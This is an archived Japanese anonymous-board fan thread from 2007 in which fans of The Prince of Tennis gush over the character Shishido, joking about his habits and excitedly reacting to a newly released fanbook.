(^^)ρ|……‥v(°Д°+)





…‥v( °°)






((+°Д°*))<げっ激ダサだな!


166 :名無しかわいいよ名無し:2007/12/01(土) 01:42:41 ID:5oTKmgnY
宍戸が言う「じゃんけんぽんっ」ってセリフに激萌
鬼ごっことか好きそうだしなw

167 :名無しかわいいよ名無し:2007/12/01(土) 03:15:44 ID:0JWNzrIh
ジャンケンで絶対最初にチョキだす人いるよね
宍戸さんもそうであってほしいw

168 :名無しかわいいよ名無し:2007/12/01(土) 08:07:47 ID:AMX8WVqq
宍戸さんにはグーが似合う

169 :名無しかわいいよ名無し:2007/12/02(日) 00:38:58 ID:E2LLO4L8
>>168
漢はこぶしでジャンケン!
ってことですか
さすが宍戸さん

170 :名無しかわいいよ名無し:2007/12/02(日) 17:58:01 ID:WirDVBxL
ラケットを指で立てるのって実はすごく難しいんだよね
バランス感覚とか指の筋力が優れてるんだろうな

171 :名無しかわいいよ名無し:2007/12/02(日) 18:22:21 ID:HNGKTFV2
今の宍戸なら人差し指だけで倒立が出来る

172 :名無しかわいいよ名無し:2007/12/02(日) 18:41:01 ID:8e3B8Gmz
もうテニス部じゃないだろwww

173 :名無しかわいいよ名無し:2007/12/02(日) 20:59:07 ID:/rXaMedU
でも宍戸さんは引退してもしょっちゅうテニスしてそう
28巻で夏休みの間だけシゴいてやる!とか言ってたけど
夏休み終わっても部に顔出ししてそうだww

174 :名無しかわいいよ名無し:2007/12/02(日) 21:17:08 ID:xrLCqE/q
それで日吉に「まーた来たよ...」
とか思われる

175 :名無しかわいいよ名無し:2007/12/02(日) 21:30:25 ID:/3HDWJmA
>174
お前は俺かw
書き込むことなくなっちゃったじゃねーかー
宍戸さん好きだー

176 :名無しかわいいよ名無し:2007/12/02(日) 21:54:26 ID:HDK/yUmZ
テニスラケットって結構重いよね

バランス、宍戸さんはかなりぎりぎりまで踏ん張るタイプだな

177 :名無しかわいいよ名無し:2007/12/02(日) 22:14:28 ID:jdKDtRGw
ラケット立て記録更新中の時に背中を押して驚かせ、怒った顔を見たり虐めたい

178 :名無しかわいいよ名無し:2007/12/02(日) 22:22:21 ID:8e3B8Gmz
宍戸さんは、そんな事されたら怒るっていうよりめちゃくちゃ落ち込みそうだ…

179 :名無しかわいいよ名無し:2007/12/02(日) 23:03:50 ID:zeUrVvBx
ペン回しも凄い巧そう
退屈な授業中とかクルックル回してるイマゲ

180 :名無しかわいいよ名無し:2007/12/02(日) 23:08:03 ID:1ceyUkP6
退屈な授業中うーんって悩みながら鼻の下にペンはさんでたら神

181 :名無しかわいいよ名無し:2007/12/02(日) 23:19:34 ID:/rXaMedU
退屈な授業中教科書の人物画に落書きしてるのもイイw

182 :名無しかわいいよ名無し:2007/12/03(月) 00:05:22 ID:RB5i2Sw4
\(+`Д´)/人生シシド

183 :名無しかわいいよ名無し:2007/12/03(月) 00:40:22 ID:2zePf2gF
>>182
可愛い…!
人生に対して自暴自棄になってるような顔だけどwww

184 :名無しかわいいよ名無し:2007/12/03(月) 01:34:42 ID:FY5STTCs
>>181
フランシスコザ○エルの顎に点を2つ書いてひっくり返してペンギン!とかやって自分で笑っちゃう宍戸さんが私の脳にてマッハで映像化された

185 :名無しかわいいよ名無し:2007/12/03(月) 07:51:11 ID:OvjYpLYW
>>184
朝から笑わすなwwww

186 :名無しかわいいよ名無し:2007/12/03(月) 08:03:15 ID:lhnjCjKq
テラ厨二病www

187 :名無しかわいいよ名無し:2007/12/03(月) 08:13:47 ID:+8bd0BY8
テラかわいすぐるwww

188 :名無しかわいいよ名無し:2007/12/03(月) 18:39:50 ID:2zePf2gF
今週号の裕太が宍戸さんに見える…

189 :名無しかわいいよ名無し:2007/12/03(月) 19:28:47 ID:vS7ojDr2
シッ!それは言わない約束よ

190 :名無しかわいいよ名無し:2007/12/04(火) 02:10:28 ID:9jpE09dz
明日が楽しみ過ぎて寝れない
しししししししししすしどさんの新情報があるかなっっっ

191 :名無しかわいいよ名無し:2007/12/04(火) 03:55:58 ID:XcZM8UOp
>>190
落ち着けwww

192 :名無しかわいいよ名無し:2007/12/04(火) 04:23:46 ID:uS4LtaWS
緊張でこんな時間に目が覚めた
本屋行きたい><

193 :名無しかわいいよ名無し:2007/12/04(火) 08:18:11 ID:fJy27hBb
調査研究があるから今日買いに行けないかもしれん…
気になって気になって調査どころじゃないよタスケテネエサンタチ

194 :名無しかわいいよ名無し:2007/12/04(火) 08:22:37 ID:egVsYQP2
>>193
20.5はコンビニで買ったから40.5も売ってるかもしれん
用事が終わったらすぐにコンビニへ行くんだ

195 :名無しかわいいよ名無し:2007/12/04(火) 08:26:28 ID:tROcci9r
講義さぼって開店待ちしてええええ
でも単位が足りません><

196 :名無しかわいいよ名無し:2007/12/04(火) 10:22:18 ID:uS4LtaWS
中1宍戸マジやばいくらい激かわいい!!
とりあえず鼻血注意な

197 :名無しかわいいよ名無し:2007/12/04(火) 11:42:12 ID:zjIPgkDt
>>196
まままままじか!!!!!
宍戸さんにはまって早5年…
楽しみ過ぎて講義内容が頭に入らないwww

198 :名無しかわいいよ名無し:2007/12/04(火) 12:02:49 ID:wye95kJE
>>197は落ち着いて勉強を再開するんだ
宍戸のせいで単位落としたらシャレにならないんだぜ

199 :名無しかわいいよ名無し:2007/12/04(火) 12:33:11 ID:Qej66WXM
mjdk!!
自主早退しようかな…w

200 :名無しかわいいよ名無し:2007/12/04(火) 12:37:02 ID:tROcci9r
ごめんちょっと留年してくる!

201 :名無しかわいいよ名無し:2007/12/04(火) 12:37:07 ID:9jpE09dz
本屋行ったらまだなかったから
段ボールから出してもらった!
凄い楽しみにしてるみたいで恥ずかしいな!
しかしそんな価値あったよ…!
宍戸さんがヤバイ 素敵にカワイイ

>>197 ご褒美が待ってるよ頑張れ!!!!1!

202 :名無しかわいいよ名無し:2007/12/04(火) 13:18:42 ID:2yyEh7wD
宍戸さんにここまで萌え殺されるとは…
本当に可愛いすぎる

203 :名無しかわいいよ名無し:2007/12/04(火) 13:19:45 ID:fJy27hBb
>>197
>>199
私ガイル…

204 :たしけ:2007/12/04(火) 13:40:02 ID:hyqrjbjK
皆さんが楽しみにしている宍戸さんのヒップサイズが明らかになります

205 :名無しかわいいよ名無し:2007/12/04(火) 15:02:33 ID:QRMOD0Pd
>>204
ぐぐぐぐぐげGJ!

206 :名無しかわいいよ名無し:2007/12/04(火) 15:25:54 ID:yq6IG2Hw
>>205
真に受けんなww

宍戸さんの鞄の中身にめっちゃ萌えた!
わんこ大好きなんだね宍戸さん(*´∀`)

207 :名無しかわいいよ名無し:2007/12/04(火) 15:56:22 ID:iQjMsRgV
チビ宍戸さんかわえええええええええええ
「激ダサだね」に萌え殺された


208 :名無しかわいいよ名無し:2007/12/04(火) 16:26:17 ID:2+M73C7Z
もうニヤニヤ止まんねwwww
宍戸さん可愛すぐるよ‥

209 :名無しかわいいよ名無し:2007/12/04(火) 16:28:38 ID:Qej66WXM
早退せずに4時間焦らした!
姐さん方のレス読んでるだけでなんか瞬間移動できそう…
鼻血用にティッシュ完備だぜ!!

210 :名無しかわいいよ名無し:2007/12/04(火) 16:51:46 ID:Gs1CWh8a
幼稚舎出身、しかも年3回の海外合宿で庶民説は消えた?
普通の家庭で年3回の海外はムリポじゃね?
しかしパパン教師で金持ちな家・・・
ハッ!まさか監督の隠しg(ry

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)